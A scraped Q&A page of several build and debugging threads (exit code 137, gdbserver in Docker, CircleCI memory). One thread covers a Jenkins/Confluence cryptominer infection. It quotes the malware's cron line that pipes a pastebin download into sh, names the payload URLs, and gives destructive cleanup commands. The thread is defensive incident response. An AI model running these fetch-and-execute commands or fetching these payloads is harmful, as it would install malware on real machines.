/home/travis/build.sh: line 41: $pid Killed (exit code 137) - travis-ci

In the Apache Jackrabbit Oak travis build we have a unit test that
makes the build erroring out
Running org.apache.jackrabbit.oak.plugins.segment.HeavyWriteIT
/home/travis/build.sh: line 41: 3342 Killed mvn verify -P${PROFILE} ${FIXTURES} ${SUREFIRE_SKIP}
The command "mvn verify -P${PROFILE} ${FIXTURES} ${SUREFIRE_SKIP}" exited with 137.
https://travis-ci.org/apache/jackrabbit-oak/jobs/44526993
The test code can be seen at
https://github.com/apache/jackrabbit-oak/blob/trunk/oak-core/src/test/java/org/apache/jackrabbit/oak/plugins/segment/HeavyWriteIT.java
What's the actual explanation for the error code? How could we
workaround/solve the issue?

Error code 137 usually comes up when a script gets killed due to exhaustion of available system resources, in this case it's very likely memory. The infrastructure this build is running on has some limitations due to the underlying virtualization that can cause these errors.
I'd recommend trying out our new infrastructure, which has more resources available and should give you more stable builds: http://blog.travis-ci.com/2014-12-17-faster-builds-with-container-based-infrastructure/

Usually Killed message means that you are out of memory. Check your limits by ulimit -a or available memory by free -m, then try to increase your stack size, e.g. ulimit -s 82768 or even more.

Related

gdbserver does not attach to a running process in a docker container

In my docker container (based on SUSE distribution SLES 15) both the C++ executable (with debug enhanced code) and the gdbserver executable are installed.
Before doing anything productive the C++ executable sleeps for 5 seconds, then initializes and processes data from a database. The processing time is long enough to attach it to gdbserver.
The C++ executable is started in the background and its process id is returned to the console.
Immediately afterwards the gdbserver is started and attaches to the same process id.
Problem: The gdbserver complains not being able to connect to the process:
Cannot attach to lwp 59: No such file or directory (2)
Exiting
In another attempt, I have copied the same gdbserver executable to /tmp in the docker container.
Starting this gdbserver gave a different error response:
Cannot attach to process 220: Operation not permitted (1)
Exiting
It has been verified, that in both cases the process is still running. 'ps -e' clearly shows the process id and the process name.
If the process is already finished, a different error message is thrown; this is clear and needs not be explained:
gdbserver: unable to open /proc file '/proc/79/status'
The gdbserver was started once from outside of the container and once from inside.
In both scenarios the gdbserver refused to attach the running process:
$ kubectl exec -it POD_NAME --container debugger -- gdbserver --attach :44444 59
Cannot attach to lwp 59: No such file or directory (2)
Exiting
$ kubectl exec -it POD_NAME -- /bin/bash
bash-4.4$ cd /tmp
bash-4.4$ ./gdbserver 10.0.2.15:44444 --attach 220
Cannot attach to process 220: Operation not permitted (1)
Exiting
Can someone explain what causes gdbserver refusing to attach to the specified process
and give advice how to overcome the mismatch, i.e. where/what do I need to examine for to prepare the right handshake between the C++ executable and the gdbserver?
The basic reason why gdbserver could not attach to the running C++ process is due to
a security enhancement in Ubuntu (versions >= 10.10):
By default, process A cannot trace a running process B unless B is a direct child of A
(or A runs as root).
Direct debugging is still always allowed, e.g. gdb EXE and strace EXE.
The restriction can be loosen by changing the value of /proc/sys/kernel/yama/ptrace_scope from 1 (=default) to 0 (=tracing allowed for all processes). The security setting can be changed with:
echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope
All credits for the description of ptrace scope belong to the following post,
see 2nd answer by Eliah Kagan - thank you for the thorough explanation! - here:
https://askubuntu.com/questions/143561/why-wont-strace-gdb-attach-to-a-process-even-though-im-root

Jenkins High CPU Usage Khugepageds

So the picture above shows a command khugepageds that is using 98 to 100 % of CPU at times.
I tried finding how does jenkins use this command or what to do about it but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When i pkill ofcourse the usage goes down but once restart its back up again.
Anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill to process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
Yes, we were also hit by this vulnerability, thanks to pittss's we were able to detect a bit more about that.
You should check the /var/logs/syslogs for the curl pastebin script which seems to start a corn process on the system, it will try to again escalated access to /tmp folder and install unwanted packages/script.
You should remove everything from the /tmp folder, stop jenkins, check cron process and remove the ones that seem suspicious, restart the VM.
Since the above vulnerability adds unwanted executable at /tmp foler and it tries to access the VM via ssh.
This vulnerability also added a cron process on your system beware to remove that as well.
Also check the ~/.ssh folder for known_hosts and authorized_keys for any suspicious ssh public keys. The attacker can add their ssh keys to get access to your system.
Hope this helps.
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to vulnerable path /rest/tinymce/1/macro/preview in frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
The exploit
Contains two parts: shell script from https://pastebin.com/raw/xmxHzu5P and x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/viruses/botnet agents, downloads and spawns the binary from /tmp/kerberods and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary of size 3395072 and date Apr 5 16:19 is packed with the LSD executable packer (http://lsd.dg.com). I haven't still examined what it does. Looks like a botnet controller.
it seem like vulnerability. try look syslog (/var/log/syslog, not jenkinks log) about like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If that, try stop jenkins, clear /tmp dir and kill all pids started with jenkins user.
After if cpu usage down, try update to last tls version of jenkins. Next after start jenkins update all plugins in jenkins.
A solution that works, because the cron file just gets recreated is to empty jenkins' cronfile, I also changed the ownership, and also made the file immutable.
This finally stopped this process from kicking in..
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the Khugepageds process, since every place I read about this error the given solution was to increase memory.
Problem was solved with #HeffZilla solution.

Java process killed due to out of memory after running job in container for an hour

I have setup a job for running automation tests in CircleCI (https://hub.docker.com/r/jiteshsojitra/docker-headless-vnc-container), it works fine but after running tests for an hour it reaches to memory limit and suddenly kills running Java/ant job. So is there any way to increase the container memory so tests can be ran for 5-6 hours in container or its paid feature?
I tried by putting - JAVA_OPTS: -Xms512m -Xmx1024m in YAML script but overall container memory size reaches to ~4GB as it looks like.
References:
https://circleci.com/gh/jiteshsojitra/zm-selenium/231
https://circleci.com/api/v1.1/project/github/jiteshsojitra/zm-selenium/231/output/106/0?file=true
Log trail:
BUILD FAILED
/headless/zm-selenium/build.xml:348: Java returned: 137
Total time: 76 minutes 26 seconds
Exited with code 137
Hint: Exit code 137 typically means the process is killed because it was running out of memory
Hint: Check if you can optimize the memory usage in your app
Hint: Max memory usage of this container is 4286337024
according to /sys/fs/cgroup/memory/memory.max_usage_in_bytes
We had this problem. It is a limit in CircleCI (or the VM, really). Only solution is to make your app use less memory.
fiskeben is right. I think your mentioned container is an fork of our consol/docker-headless-vnc-container image. So you can add in the startup script the following lines.
# set correct java startup
export _JAVA_OPTIONS="-Duser.home=$HOME -Xmx${JVM_HEAP_XMX}m"
# add docker jvm flags, can maybe removed with JDK9
export _JAVA_OPTIONS="$_JAVA_OPTIONS -XX:+UnlockExperimentalVMOptions -XX:+UseCGroupMemoryLimitForHeap"
Now you would be able to set the environment variable JVM_HEAP_XMX with amount of megabytes your JVM should use, e.g.
docker run -e JVM_HEAP_XMX=512 ...
If you want to determine the size dynamically take a look at that script jvm_options.sh.

ios:createIPA gradle task fails with error in HfsCompressor.compressNative

When building my libGDX game for iOS from the command line, using ./gradlew ios:createIPA, I sometimes get the following error:
...
:ios_lite:createIPA
RoboVM has detected that you are running on a slow HDD. Please consider mounting a RAM disk.
To create a 2GB RAM disk, run this in your terminal:
SIZE=2048 ; diskutil erasevolume HFS+ 'RoboVM RAM Disk' `hdiutil attach -nomount ram://$((SIZE * 2048))`
See http://docs.robovm.com/ for more info
RoboVM has detected that you are running on a slow HDD. Please consider mounting a RAM disk.
To create a 2GB RAM disk, run this in your terminal:
SIZE=2048 ; diskutil erasevolume HFS+ 'RoboVM RAM Disk' `hdiutil attach -nomount ram://$((SIZE * 2048))`
See http://docs.robovm.com/ for more info
:ios_lite:createIPA FAILED
FAILURE: Build failed with an exception.
* What went wrong:
Execution failed for task ':ios_lite:createIPA'.
> org.robovm.compiler.util.io.HfsCompressor.compressNative(Ljava/lang/String;[BI)Z
* Try:
Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output.
BUILD FAILED
--info and --debug provide much more output, but no more useful information, and --stacktrace just shows the internal stack trace within Gradle.
Using Gradle 2.2, OS X 10.11.5, JVM 1.8.0_74, RoboVM 1.12.0.
What causes this error, and how can I fix it?
I still don't know what's causing it (better answers welcome in that regard), but I have found a workaround: restart the Gradle daemon. Before building, simply run:
$ ./gradlew --stop
The daemon will automatically be restarted for the next build. So far, this workaround has reliably fixed the error for me.

How do I run Docker Swarm's integration tests?

I've followed the instructions at https://github.com/docker/swarm/blob/master/CONTRIBUTING.md to run Swarm's integration tests, but they do not work. The command ./test/integration/run.sh gives unusual error messages. (See http://pastebin.com/hynTXkNb for the full output).
The message about swappiness is the first thing that looks wrong. My kernel does support it - I tested it. /proc/sys/vm/swappiness is readable and writable, and configurable through sysctl.conf .
The next line that looks wrong is the chmod. It tries to access a file in /usr/local/bin - which is wrong because Docker is installed to /usr/bin , and because that file wouldn't be writable by anyone but root anyway.
I know the daemon is running, and working correctly. For example:
user#box:~$ docker run debian /bin/echo 'hello world asdf'
WARNING: Your kernel does not support memory swappiness capabilities, memory swappiness discarded.
hello world asdf
Does anyone know how to fix this issue, and get the integration tests running?
If not, does anyone at least know where to dig into the code in Docker to find out what is failing?

Resources